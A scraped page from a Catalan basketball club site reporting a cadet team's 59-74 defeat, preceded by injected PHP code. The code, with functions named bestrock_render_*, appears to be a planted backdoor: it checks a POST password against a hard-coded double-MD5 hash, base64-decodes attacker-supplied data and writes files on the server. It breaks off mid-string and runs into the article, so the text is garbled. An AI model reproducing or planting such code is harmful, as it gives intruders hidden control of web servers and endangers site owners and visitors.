function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet masculí A es descentra a l'últim quart (59-74) - Tgn Bàsquet Club -

El cadet masculí A es descentra a l’últim quart (59-74)

Updated: gener 13, 2014

Derrota dolorosa del cadet masculí A contra el Manyanet que es va endur el triomf en els últims tres minuts del partit aprofitant el desconcert local. Així, els locals, gràcies al seu domini en el rebot van gaudir d’avantatges de fins a 9 punts en el segon període que van desaprofitar arribant al descans dos punts per sota (32-34). El guió va ser idèntic en el tercer període, en què el conjunt lila va dur la iniciativa amb deu punts per davant del seu rival però va llençar a terra la feina ben feta en els últims minuts de partit. La sequera anotadora del TGN Bàsquet va ser un llast però va ser capaç de mantenir el tipus fins que dos errades van concedir dues cistelles fàcils al Manyanet que, tot seguit va anotar un triple. El parcial de 0-7 va enfonsar el TGN Bàsquet que va acabar encaixant un parcial de 0-17 en aquests minuts.